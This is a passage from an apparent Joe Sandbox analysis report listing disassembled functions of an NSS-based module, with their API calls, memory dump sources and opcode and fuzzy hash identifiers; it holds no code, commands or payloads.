                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 109b7715d90fe8d6dbcdad4fc92c5784698e7fd5dd6f089e68548812cec16fec
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B2114CB55046059FDB00BFB8C48A56EBBF4FF05358F115A69D88587200EB78E496CBD2
                                                                                                                                                                                                                                                            Function 6BFD2B70 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • strstr.VCRUNTIME140(?,.dll), ref: 6BFD2B81
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s%s,?,.dll), ref: 6BFD2B98
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(%s\%s%s,?,?,.dll), ref: 6BFD2BB4
                                                                                                                                                                                                                                                            • PR_smprintf.NSS3(6BFFAAF9,?), ref: 6BFD2BC4
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: R_smprintf$strstr
                                                                                                                                                                                                                                                            • String ID: %s\%s$%s\%s%s$.dll
                                                                                                                                                                                                                                                            • API String ID: 3360132973-3501675219
                                                                                                                                                                                                                                                            • Opcode ID: b6dee37f782e6ff50d75484dd03dc244c0c15babd7d59296bf54f62e8afaa0a2
                                                                                                                                                                                                                                                            • Instruction ID: 88374beb17e990aad21eff65ab0bcecac987822190df9755409250b33d8610b7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6dee37f782e6ff50d75484dd03dc244c0c15babd7d59296bf54f62e8afaa0a2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42F0A727500464714910196EAC05D9B3E6DCDD36E4B08019EFC1CB6335F69F910280F3
                                                                                                                                                                                                                                                            Function 6BEDD9D0 Relevance: 12.2, APIs: 8, Instructions: 237COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BEDAB10: DeleteCriticalSection.KERNEL32(D958E852,6BEE1397,5B5F5EC0,?,?,6BEDB1EE,2404110F,?,?), ref: 6BEDAB3C
                                                                                                                                                                                                                                                              • Part of subcall function 6BEDAB10: free.MOZGLUE(D958E836,?,6BEDB1EE,2404110F,?,?), ref: 6BEDAB49
                                                                                                                                                                                                                                                              • Part of subcall function 6BEDAB10: DeleteCriticalSection.KERNEL32(5D5E6C0D), ref: 6BEDAB5C
                                                                                                                                                                                                                                                              • Part of subcall function 6BEDAB10: free.MOZGLUE(5D5E6C01), ref: 6BEDAB63
                                                                                                                                                                                                                                                              • Part of subcall function 6BEDAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6BEDAB6F
                                                                                                                                                                                                                                                              • Part of subcall function 6BEDAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6BEDAB76
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,CE534353,?,00000007), ref: 6BEDDA10
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C,?,?,?,CE534353,?,00000007), ref: 6BEDDA24
                                                                                                                                                                                                                                                            • PK11_IsFriendly.NSS3(?,?,?,?,CE534353,?,00000007), ref: 6BEDDA7E
                                                                                                                                                                                                                                                            • PK11_IsLoggedIn.NSS3(?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6BEDDA96
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(00000000,?,?,?,CE534353,?,00000007), ref: 6BEDDB17
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6BEDDBFB
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(00000000), ref: 6BEDDC3C
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(00000000), ref: 6BEDDC69
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$DeleteUnlockfree$K11_$EnterFriendlyLoggedValuememcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3222563534-0
                                                                                                                                                                                                                                                            • Opcode ID: 3774aa5a3e21690839239502a9b894001fd73bcdbf53c90be039c92d51720f56
                                                                                                                                                                                                                                                            • Instruction ID: 50a3c3d789a930add8839d9eaca77c9f5db8b3bf74a8742508c95c80930feea9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3774aa5a3e21690839239502a9b894001fd73bcdbf53c90be039c92d51720f56
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4291BC79A402169BDB00CF68C881AAAB7B1FF44308F24C168D9195B351E7B9F963CFD1
                                                                                                                                                                                                                                                            Function 6BF0CA30 Relevance: 12.2, APIs: 8, Instructions: 174COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF0CA95
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 6BF0CAA9
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,00000000,?,6BF0C8CF,?,?,?), ref: 6BF0CAE7
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6BF0CB09
                                                                                                                                                                                                                                                            • PK11_GetBlockSize.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?,6BF0C8CF,?,?,?), ref: 6BF0CB31
                                                                                                                                                                                                                                                              • Part of subcall function 6BF01490: PORT_Alloc_Util.NSS3(0000000C,?,?,?,?,6BF0CB40,?,00000000), ref: 6BF014A1
                                                                                                                                                                                                                                                              • Part of subcall function 6BF01490: PORT_ZAlloc_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,6BF0C8CF,?), ref: 6BF014C7
                                                                                                                                                                                                                                                              • Part of subcall function 6BF01490: memset.VCRUNTIME140(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF014E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BF01490: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000), ref: 6BF014F5
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BF0CB97
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BF0CBB2
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6BF0C8CF), ref: 6BF0CBE2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: UnlockUtil$Alloc_$BlockCriticalEnterErrorItem_K11_SectionSizeValueZfreememcpymemset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2753656479-0
                                                                                                                                                                                                                                                            • Opcode ID: 5de2564ba141f2627cf3e5a2804db9ad4a7b4b3274ad104ba3bc4ce05447e966
                                                                                                                                                                                                                                                            • Instruction ID: 3464dacba5d068360be712c6ae12d5b804f74d3f3811aa3238de1293f96092c5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5de2564ba141f2627cf3e5a2804db9ad4a7b4b3274ad104ba3bc4ce05447e966
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A5164B6E001199FDF00DFA4DC91A9EB7B4BF08314F144164ED05A7221EB39ED54DBA1
                                                                                                                                                                                                                                                            Function 6BF088E0 Relevance: 12.1, APIs: 8, Instructions: 112COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6BF088FC
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1BE30: SECOID_FindOID_Util.NSS3(6BED311B,00000000,?,6BED311B,?), ref: 6BF1BE44
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6BF08913
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BEC87ED,00000800,6BEBEF74,00000000), ref: 6BF21000
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PR_NewLock.NSS3(?,00000800,6BEBEF74,00000000), ref: 6BF21016
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PL_InitArenaPool.NSS3(00000000,security,6BEC87ED,00000008,?,00000800,6BEBEF74,00000000), ref: 6BF2102B
                                                                                                                                                                                                                                                            • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6BFED864,?), ref: 6BF08947
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1E200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6BF1E245
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1E200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6BF1E254
                                                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6BF0895B
                                                                                                                                                                                                                                                            • DER_GetInteger_Util.NSS3(?), ref: 6BF08973
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BF08982
                                                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6BF089EC
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE006,00000000), ref: 6BF08A12
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2145430656-0
                                                                                                                                                                                                                                                            • Opcode ID: cfafec9e21c1b7a54f961a8d61620a80c42bf3fa3ac2e710f41ec940a4c2f94f
                                                                                                                                                                                                                                                            • Instruction ID: 3a5dc3a0b6289db9b0446137bbe5f27786b5a50b1eadc0402ac986ab6187f21a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfafec9e21c1b7a54f961a8d61620a80c42bf3fa3ac2e710f41ec940a4c2f94f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62317FB3E0860057F720623CAC6276A76959F91B68F140B75D919D72B1FF3EC4429293
                                                                                                                                                                                                                                                            Function 6BEBAB70 Relevance: 12.1, APIs: 8, Instructions: 104pipeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,?,00000000), ref: 6BEBABAF
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 6BEBAC44
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE896,00000000), ref: 6BEBAC50
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BF6C2BF
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000), ref: 6BEBAC62
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6BEBAC75
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6BEBAC7A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Error$CloseHandle$CreateLastPipeValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4247729451-0
                                                                                                                                                                                                                                                            • Opcode ID: ae62976195a07cac4c84a80d46f6d8fd8eedcc1516debc27b4026c86bc35c92b
                                                                                                                                                                                                                                                            • Instruction ID: 33a764fb4a8933d540c55427e5588b0b902bff778fa91ab533e4655e10713a9d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae62976195a07cac4c84a80d46f6d8fd8eedcc1516debc27b4026c86bc35c92b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0831C075A402059FDB04DFA8CD85A6ABBF4FF49308B244069D9099B361DB39DC41CF91
                                                                                                                                                                                                                                                            Function 6BFD1B40 Relevance: 12.1, APIs: 8, Instructions: 99COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_Lock.NSS3(?), ref: 6BFD1B50
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6BEB1A48), ref: 6BF89BB3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6BEB1A48), ref: 6BF89BC8
                                                                                                                                                                                                                                                            • PR_NotifyAllCondVar.NSS3(?), ref: 6BFD1B75
                                                                                                                                                                                                                                                            • PR_NotifyAllCondVar.NSS3(?), ref: 6BFD1B80
                                                                                                                                                                                                                                                            • PR_WaitCondVar.NSS3(?,000000FF), ref: 6BFD1B93
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6BFD1BB0
                                                                                                                                                                                                                                                            • PR_NotifyCondVar.NSS3(?), ref: 6BFD1BFD
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BFD1C3E
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE8D4,00000000), ref: 6BFD1C54
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Cond$Notify$Error$CriticalEnterLockSectionUnlockValueWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3317306279-0
                                                                                                                                                                                                                                                            • Opcode ID: 2e8689eb88ee697af054005026fb7c3fb905a7bf6f764feea26f87602051cd9f
                                                                                                                                                                                                                                                            • Instruction ID: a1cc04f049cd5b1f4f50ccd6c2ad02007eb62ae62676fcc9fa081a857729255c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e8689eb88ee697af054005026fb7c3fb905a7bf6f764feea26f87602051cd9f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B831B2B6A00A25AFD710CF28D841E01F7F1FF15718B288668E85947BA0E376F960CBC1
                                                                                                                                                                                                                                                            Function 6BEE4BA0 Relevance: 12.1, APIs: 8, Instructions: 80COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(6BEEA6A2,?,?,00000000), ref: 6BEE4BB9
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6BEE4BD2
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEE4BEF
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6BEE4C08
                                                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3 ref: 6BEE4C21
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BEE4C2E
                                                                                                                                                                                                                                                            • PR_Now.NSS3 ref: 6BEE4C3D
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BEE4C62
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 326028414-0
                                                                                                                                                                                                                                                            • Opcode ID: 513ebb6cf20546851bc3667b87b4a0b1c43736066a2410498ad61f296abde764
                                                                                                                                                                                                                                                            • Instruction ID: b58365e544fb846479cc313a4db95d18d2a25ce5d792632fe993242010937766
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 513ebb6cf20546851bc3667b87b4a0b1c43736066a2410498ad61f296abde764
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51316FB5A006058FDB00EF78C18541ABBF4FF09354F158A69DC9987311EB38E891CBD1
                                                                                                                                                                                                                                                            Function 6BEE4A10 Relevance: 12.1, APIs: 8, Instructions: 80COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(6BEE5385,?,?,00000000), ref: 6BEE4A29
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6BEE4A42
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEE4A5F
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6BEE4A78
                                                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3 ref: 6BEE4A91
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BEE4A9E
                                                                                                                                                                                                                                                            • PR_Now.NSS3 ref: 6BEE4AAD
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BEE4AD2
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 326028414-0
                                                                                                                                                                                                                                                            • Opcode ID: 3801a7c9e6de2dedfda050956222e50ce240fbdf418479a6df863023b814300c
                                                                                                                                                                                                                                                            • Instruction ID: 3fcc26a6d0781bf6c438ec41ed81a3cf389841247882f7923c6a9504a8cf0650
